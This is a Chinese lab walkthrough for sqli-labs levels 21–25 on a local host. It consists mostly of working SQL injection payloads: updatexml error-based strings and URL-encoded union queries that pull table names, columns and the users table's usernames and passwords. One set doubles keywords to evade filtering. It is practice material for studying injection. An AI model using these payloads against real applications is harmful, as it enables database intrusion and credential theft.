sqlilabs less21-25关手工注入

第21关

一.登录页面

二 .Burp Suite 抓包，进入重放器

三.查询数据库 先进行编码

')and updatexml(1,concat(1,database()),1)#

四.查表，先进行编码

')and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)

五.查列，先进行编码

')and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

六.查询users表中所有数据

')and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第22关

一.登录页面

二 .Burp Suite 抓包，进入重放器

三.查询数据库 先进行编码

"and updatexml(1,concat(1,database()),1)#

四.查表，先进行编码

"and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)#

五.查列，先进行编码

"and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) #

六.查询users表中所有数据

"and updatexml(1,concat(1,(select group_concat(id,username,password) from users)),1)#

第23关

一.看有无回显点

二查询数据库

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,database(),3%20or%20%271%27=%271

三.查表

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20or%20%271%27=%271

四.查列

http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271http://127.0.0.1/Less-23/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20or%20%271%27=%271

第24关

使用二次注入

一.注册用户

二.admin的密码被修改为777777

第25关

一.闭合方式为 单引号 '

http://127.0.0.1/Less-25/?id=1%27%20--+http://127.0.0.1/Less-25/?id=1%27%20--+

二.查询数据库

http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+http://127.0.0.1/Less-25/?id=0%27%20union%20select%201,database(),user()%20--+

三. 查询库中所有表

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%27security%27--+

四.查询列

http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+http://127.0.0.1/Less-25/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20infoorrmation_schema.columns%20where%20table_schema=%27security%27%20anandd%20table_name=%27users%27--+